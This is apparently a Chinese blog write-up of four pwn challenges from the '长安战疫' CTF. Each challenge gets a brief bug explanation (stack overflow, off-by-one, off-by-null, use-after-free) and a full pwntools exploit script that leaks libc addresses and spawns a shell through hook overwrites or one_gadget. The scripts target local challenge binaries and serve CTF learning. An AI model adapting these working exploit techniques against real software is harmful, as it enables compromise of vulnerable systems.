长安战疫pwn
发表于:2022-01-09 |
字数统计: 1.2k | 阅读时长: 6分钟 | 阅读量:

长安战疫pwn wp

pwn1

pwn签到题,唯一有点坑就是在出函数时并不仅仅是leave;ret,而是多出了两行汇编代码。因此需要我们分析和调试一下。

7Fg7qg.png

exp

1
2
3
4
5
6
7
from pwn import *
io=process('pwn1')
io.recvuntil(":")
stack = int(io.recv(10),16)
gdb.attach(io)
io.sendline('a'*0x30+p32(0x8048540)+p32(stack+0x34))
io.interactive()

pwn2

libc-2.27的off-by-one,细心一点就能发现for循环这块会让我们多输入一个字节。

7FgLIs.png

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
from pwn import *
io=process('./pwn2')
elf=ELF('./pwn2')
libc=elf.libc
#libc=ELF('./libc-2.27.so')
context.log_level='debug'

def add(size,content):
	io.sendlineafter('Choice: ','1')
	io.sendlineafter('size: ',str(size))
	io.sendafter('content: ',content)

def edit(index,content):
	io.sendlineafter('Choice: ','2')
	io.sendlineafter('idx: ',str(index))
	io.sendlineafter('content: ',content)

def dele(index):
	io.sendlineafter('Choice: ','3')
	io.sendlineafter('idx: ',str(index))

def show(index):
	io.sendlineafter('Choice: ','4')
	io.sendlineafter('idx: ',str(index))

def exp():
	add(0xf8,'f1ag\n')#0
	add(0xf8,'f1ag\n')#1
	add(0xf8,'f1ag\n')#2
	add(0xf8,'f1ag\n')#3
	add(0x18,'f1ag\n')#4
	dele(2)
	add(0xf8,'a'*0xf0+p64(0x300)+'\n')#2

	for i in range(7):
		add(0xf8,'a\n')#5~11
	for i in range(7):
		dele(11-i)
	
	dele(0)
	gdb.attach(io)
	dele(3)
	for i in range(7):
		add(0xf8,'f1ag\n')#0,3,5~9
	add(0xf8,'f1ag\n')#10
	show(1)
	malloc_hook = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-96-16
	libc_base = malloc_hook - libc.symbols['__malloc_hook']
	print('libc_base',hex(libc_base))
	free_hook = libc.symbols['__free_hook'] + libc_base
	system = libc.symbols['system'] + libc_base

	add(0xf8,'f1ag\n')#11=1
	dele(1)
	edit(11,p64(free_hook-8)+'\n')
	add(0xf8,'f1ag\n')#1
	add(0xf8,'/bin/sh\x00'+p64(system)+'\n')#12
	dele(12)
	io.interactive()
exp()

pwn3

这个题利用的是strcpy、strcat等一些对字符串操作的函数的漏洞,当他们复制字符串的时候会把字符串的最后一个字节\x00给带上,极容易造成off-by-null漏洞。而这个题的漏洞点正在于此,\x00正好将存放长度的地址覆盖置0,就可以将长度的值改写为一个很大的值,打败boss进入到奖励函数中。

7Fgqaj.png

因为有exit函数,很容易联想到打exit_hook。[exit_hook的知识点]( PWN学习—exit_hook-偷家 - BlackBird’s Blog (blackbird-bb.github.io) ) 参考这位西电大佬写的博客,然后直接打onegadget就ok了。在打one_gadget的时候正常出来的四个gadget不能打通,这时候在one_gadget后加上-l2可以找到更多的gadget。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
#io=process('./Gpwn3')
io=remote('127.0.0.1',10002)
elf=ELF('./Gpwn3')
libc=ELF('./libc-2.23.so')
context.log_level='debug'

def create(description):
	io.sendlineafter('choice:','1')
	io.sendafter(' level :\n',description)

def power(description):
	io.sendlineafter('choice:','2')
	io.sendafter('another level :',description)	

def beat():	
	io.sendlineafter('choice:','3')

def give_up():
	io.sendlineafter('choice:','4')
		 
def exp():
	create('a'*35+'\n')
	power('a')
	power('\xff\xff\xff\xff')
	beat()
	
	io.recvuntil('reward: ')
	puts=int(io.recv(14),16)
	libc_base=puts-libc.symbols['puts']	
	print('libc_base',hex(libc_base))
	system=libc_base+libc.symbols['system']
	binsh=libc_base+libc.search('/bin/sh').next()
	dl_rtld_unlock_recursive = libc_base+0x5f0040+3856
	gadget=[0x45226,0x4527a,0xf03a4,0xf1247,0xcd173,0xcd248,0xf03b0,0xf67f0]
	#gdb.attach(io)
	io.sendafter('your name:',p64(dl_rtld_unlock_recursive))
	
	io.sendafter('for you!',p64(gadget[7]+libc_base))
	io.interactive()
exp()

pwn4

这个题有个小问题,忘了在add函数后加break跳出switch,因此有师傅修switch时修不出来add,只能看汇编代码,在这里和各位师傅道个歉。

此题的漏洞在free时没有对指针置0,libc-2.31的uaf。

7FgbZQ.png

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pwn import *
io=process('./pwn4')
elf=ELF('./pwn4')
libc=elf('./libc-2.31.so')
context.log_level='debug'

def add(index,name,key,value):
	io.sendlineafter('Your choice: ','1')
	io.sendlineafter('Your index: ',str(index))
	io.sendlineafter('Enter your name: ',name)
	io.sendlineafter('Please input a key: ',key)
	io.sendlineafter('Please input a value: ',str(value))
	
def show(index):
	io.sendlineafter('Your choice: ','2')
	io.sendlineafter('Your index: ',str(index))

def edit(index,name,length,key,value):
	io.sendlineafter('Your choice: ','3')
	io.sendlineafter('Your index: ',str(index))
	io.sendlineafter('Enter your name: ',name)
	io.sendlineafter('New key length: ',str(length))
	io.sendlineafter('Key: ',key)
	io.sendlineafter('Value: ',str(value))
	
def dele(index):
	io.sendlineafter('Your choice: ','4')
	io.sendlineafter('Your index: ',str(index))
	
def exp():
	add(0,'f1ag','a'*0x417,0)
	add(1,'f1ag','a'*0x3c7,1)
	dele(0)
	show(0)
	malloc_hook = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 96 -16
	libc_base = malloc_hook - libc.symbols['__malloc_hook']
	print('libc_base',hex(libc_base))
	free_hook = libc.symbols['__free_hook'] + libc_base
	system = libc.symbols['system'] + libc_base
	
	add(2,'f1ag','a'*0x57,2)
	add(3,'f1ag','a'*0x57,3)
	dele(3)
	dele(2)
	#gdb.attach(io)
	edit(1,'f1ag',8,'/bin/sh\x00',1)
	edit(2,'f1ag',6,p32((free_hook-0x51)&0xffffffff)+p16(((free_hook)>>32)&0xffff),2)
	
	add(4,'f1ag','a'*0x51+p32((system)&0xffffffff)+p16(((system)>>32)&0xffff),'4')
	
	#add(6,'f1ag',p64(system),5)
	
	dele(1)
	io.interactive()
exp()
上一篇:
webpwn初探
下一篇:
安洵final

    • Copyright © 2019 - 2020 yuang01 | Powered by Hexo | Theme Bamboo

    本站总访问量: |